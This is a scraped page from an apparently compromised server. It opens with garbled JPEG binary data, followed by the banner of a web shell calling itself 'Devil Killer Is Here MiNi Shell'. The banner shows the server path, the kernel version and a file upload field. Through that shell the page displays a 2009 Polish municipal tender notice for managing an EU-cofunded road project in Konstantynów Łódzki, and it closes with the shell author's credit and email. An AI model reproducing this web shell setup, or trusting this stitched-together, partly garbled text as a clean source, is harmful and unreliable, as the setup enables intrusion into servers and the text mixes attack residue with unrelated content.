JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091006/170413-N-2009.html

<p class="kh_header"><b>Konstantynów Łódzki: Menadżer projektu współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego -Poprawa komunikacji na drogach  regionalnych w Konstantynowie Łódzkim-</b><br>
<b>Numer ogłoszenia: 170413 - 2009; data zamieszczenia: 06.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Zgierska 2, 95-050 Konstantynów Łódzki, woj. łódzkie, tel. 042 2111173, faks 042 2111168.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.konstantynow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.konstantynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Menadżer projektu współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego -Poprawa komunikacji na drogach  regionalnych w Konstantynowie Łódzkim-.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przez Menadżera Projektu na rzecz Zamawiającego usług, polegających na zarządzaniu, kontrolowaniu, nadzorowaniu i rozliczeniu projektu: -Poprawa komunikacji na drogach regionalnych w Konstantynowie Łódzkim - zwanego dalej Projektem, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego . 
Skrócony opis projektu stanowi załącznik nr 4 do SIWZ.

Menadżer Projektu zobowiązany jest do zarządzania, kontrolowania i nadzorowania realizacji Projektu, w celu zapewnienia jego prawidłowej, terminowej realizacji oraz rozliczenia finansowego, zgodnymi z obowiązkami Zamawiającego wynikającymi z umów na dofinansowanie Projektu, zawartymi z jednostkami współfinansującymi Projekt, a także z obowiązkami wynikającymi z przepisów prawa, właściwych dla zrealizowanego Projektu.
Do zadań Menadżera Projektu należy w szczególności w zakresie zarządzania Projektem:
1.dołożenia wszelkich starań, by Projekt został zrealizowany zgodnie z harmonogramem oraz  zgodnie z zaleceniami wydanymi przez Instytucję Zarządzającą i innymi wymogami dotyczącymi przygotowania i realizacji Projektu, które wynikają z RPO WŁ na lata 2007-2013
2.udzielania Zamawiającemu pisemnych odpowiedzi na zapytania w możliwie najkrótszym terminie lub w terminie określonym w tych zapytaniach oraz udzielania informacji i wyjaśnień na temat przygotowania i realizacji Projektu, w tym także do przedkładania wymaganych dokumentów
3.opracowania i dostarczania  Zamawiającemu  sprawozdania kwartalnego i rocznego dotyczącego realizacji Projektu w terminie 5 dni roboczych od zakończenia okresu sprawozdawczego
4. opracowania i dostarczania  Zamawiającemu  sprawozdania końcowego w terminie 15 dni  od dnia zakończenia Projektu
5.aktualizacji harmonogramów płatności
6.przygotowywania i przekazywania wniosków o płatność
7.kontrolowaniu realizowanych prac pod względem terminowości, poprawności oraz zgodności prac z zawartymi umowami z Wykonawcami Projektu 
8.bezzwłocznym informowaniu Zamawiającego o zauważonych nieprawidłowościach 
i zagrożeniach w rozumieniu art. 2 pkt 7 Rozporządzenia Rady WE Nr 1083-2006 
z uwzględnieniem Wytycznych Ministra Rozwoju Regionalnego
9.wskazywaniu sposobów uniknięcia lub usunięcia nieprawidłowości
10.współdziałanie z inspektorem nadzoru  w zakresie realizacji Projektu zgodnie 
z harmonogramem. 

Do zadań Menadżera Projektu nie należy:
1.bezpośredni nadzór nad wykonywaniem robót budowlanych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.80.00-8, 71.70.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIENIA TYCH WARUNKÓW 

7.1. Każdy z Wykonawców ubiegających się o udzielenie zamówienia publicznego musi spełniać następujące warunki udziału w postępowaniu i złożyć oświadczenie z art. 22 ustawy:

7.1.1.posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień

7.1.2.posiadać niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponować osobami zdolnymi do wykonania zamówienia;
Do udziału w postępowaniu zostanie dopuszczony Wykonawca, który pełnił co najmniej jedną usługę menadżera projektu współfinansowanego z funduszy unijnych.  Do udziału w postępowaniu zostanie dopuszczony Wykonawca, który dysponuje co najmniej 2 osobami, które będą uczestniczyć w wykonywaniu zamówienia. 

Wymagania dotyczące osób wykonujących zamówienie:

Wymagane minimalne wykształcenie
Wymagane minimalne doświadczenie
Wymagane dodatkowe kwalifikacje
Ekspert nr 1
Wyższe
Koordynowanie realizacji co najmniej dwóch projektów współfinansowanych z funduszy europejskich
Znajomość procedur realizacji i rozliczania inwestycji finansowanych z funduszy europejskich
Ekspert nr 2
Wyższe
Koordynowanie realizacji co najmniej dwóch projektów współfinansowanych z funduszy europejskich
Znajomość procedur realizacji i rozliczania inwestycji finansowanych z funduszy europejskich

Ocena spełnienia tego warunku przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego będzie dokonywana łącznie w stosunku do tych wykonawców zamówienia.

         7.1.3  znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

7.1.4  nie podlegać wykluczeniu z postępowania, na podstawie art. 24 Prawa zamówień publicznych.

Ocena spełnienia tego warunku przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego będzie dokonywana odpowiednio indywidualnie w stosunku do każdego z tych wykonawców lub łącznie w odniesieniu do wszystkich wykonawców -wadium- na podstawie przedłożonych: oświadczeń i innych wymaganych dokumentów określonych w pkt.8.


7.2   Ocena spełnienia przez wykonawcę powyższych warunków będzie dokonywana według zasady; -spełnia-nie spełnia-..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 8       DOKUMENTY POTWIERDZAJĄCE SPEŁNIENIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ INNE DOKUMENTY WYMAGANE OD WYKONAWCÓW 

8.1.1   W celu potwierdzenia spełnienia warunków udziału w postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące dokumenty:

Dokumenty służące do potwierdzenia statusu prawnego:
Nazwa dokumentu
Opis dokumentu
Odpis z KRS

Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - potwierdzające uprawnienia do wykonywania działań lub czynności objętych niniejszym zamówieniem - nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
Oświadczenie o niepodleganiu wykluczeniu
Oświadczenie, iż wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 Prawa zamówień publicznych

Zaświadczenie dotyczące US

Zaświadczenie, iż we właściwym urzędzie skarbowym Wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
Zaświadczenie dotyczące ZUS

Zaświadczenie, iż we właściwym oddziale Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega płaceniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu

Dokumenty służące do potwierdzenia zdolności technicznej:
Nazwa dokumentu
Opis dokumentu
Wykaz osób wykonujących zamówienie
Wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia. Należy dołączyć kopie stosownych  dokumentów potwierdzających spełnianie warunków określonych w punkcie 7.1.2.
Wykaz wykonanych usług
Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług menadżera projektu współfinansowanego z Funduszy unijnych w okresie od lipca 2006 do  lipca 2009, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie.

8.1.2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów:

-  aktualnego odpisu z właściwego rejestru -albo aktualnego zaświadczenia o wpisie do  ewidencji gospodarczej-,
-  aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Prawa zamówień publicznych,
-  aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
  - nie otwarto jego likwidacji ani nie ogłoszono upadłości;
  - nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
  - nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, wymienionych wyżej (jako opcja) (odpis z właściwego rejestru, informacja z Krajowego Rejestru Karnego, zaświadczenie właściwego naczelnika urzędu skarbowego, oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego) a także nie można uzyskać aktualnej informacji z Krajowego Rejestru Karnego (albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 Prawa zamówień publicznych), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

8.2 Dokumenty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem potwierdzające spełnienie przez wykonawcę warunków udziału w postępowaniu powinny być załączone do składnej oferty.
8.3  Wraz z ofertą każdy z Wykonawców powinien złożyć oświadczenie o spełnianiu warunków udziału w postępowaniu.
8.4  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego mają obowiązek załączyć do oferty dokument pełnomocnictwa uprawniający do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego lub uprawniający do reprezentowania w postępowaniu i do zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.konstantynow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Konstantynowie Łódzim ul. Zgierska 2 pok. nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 11:30, miejsce: Urząd Miejski w Konstantynowie Łódzkim 
95-050 Konstantynów Łódzki ul. Zgierska 2
kancelaria pokój 06.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com